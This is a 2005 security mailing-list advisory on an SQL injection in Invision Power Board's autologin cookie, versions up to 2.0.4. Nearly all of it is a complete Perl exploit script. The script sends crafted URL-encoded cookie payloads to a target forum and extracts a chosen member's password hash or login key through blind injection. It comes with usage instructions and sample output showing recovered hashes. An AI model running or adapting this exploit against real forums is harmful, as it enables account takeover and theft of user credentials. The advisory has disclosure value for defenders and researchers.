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[EXPL] Invision Power Board SQL Injection Vulnerability (member_id, Expl

Subject: [EXPL] Invision Power Board SQL Injection Vulnerability (member_id, Exploit)
Date: 19 May 2005 17:06:10 +0200
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  Invision Power Board SQL Injection Vulnerability (member_id, Exploit)
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SUMMARY

 <http://www.invisionboard.com/> Invision Power Board (IPB) is "a 
professional forum system that has been built from the ground up with 
speed and security in mind, taking advantage of object oriented code, 
highly-optimized SQL queries, and the fast PHP engine. A comprehensive 
administration control panel is included to help you keep your board 
running smoothly. Moderators will also enjoy the full range of options 
available to them via built-in tools and moderators control panel. Members 
will appreciate the ability to subscribe to topics, send private messages, 
and perform a host of other options through the user control panel. It is 
used by millions of people over the world".

An SQL injection vulnerability was found in Invision Power Board allows 
attackers to add, change, delete and view records from the database.

DETAILS

Vulnerable Systems:
 * Invision Power Board 2.0.4 and prior

Exploit:
#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = 
On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~]    SERVER : blah.com
## [~]      PATH : /ipb13/
## [~] MEMBER ID : 1
## [~]    TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com  /ipb202/ 1 1
## [~]    SERVER : blah.com
## [~]      PATH : /ipb202/
## [~] MEMBER ID : 1
## [~]    TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~]    SERVER : $server\r\n";
print "[~]      PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]    TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
 {
 if(length($allchar) > 0){
 print qq{\b\b DONE ]
 
 MEMBER ID : $member_id
 };
 print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
 print $allchar."\r\n";
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit();
 }
else
 {
  $allchar .= chr(42);
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0];
 $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
 $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75" . 
"%62%73%74%72%69%6E%67%28";
 $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
 $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
 $nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0" . 
"%E0%F1%21%20";
 $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", 
PeerPort => "80");

 printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: 
%s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: 
close\n\n",
 $path, $server, $cmember_id, $pass_hash1, $cmember_id, $pass_hash2, 
$pass_hash3, $nmalykh);
 
 while(<$socket>)
  {
  if (/Set-Cookie: session_id=0;/) { return 1; }
  }

 return 0;
 }
 
sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 print q(
 Invision Power Board v < 2.0.4 SQL injection exploit
 ----------------------------------------------------
 USAGE:
 ~~~
 r57ipb2.pl [server] [/folder/] [member_id] [target]
 
 [server]    - host where IPB installed
 [/folder/]  - folder where IPB installed
 [member_id] - user id for brute
 
 targets:
          0 - IPB 1.*
          1 - IPB 2.* (Prior To 2.0.4)
 
 e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
 ----------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }


ADDITIONAL INFORMATION

The information has been provided by  <mailto:roman@rs-labs.com> RusH.



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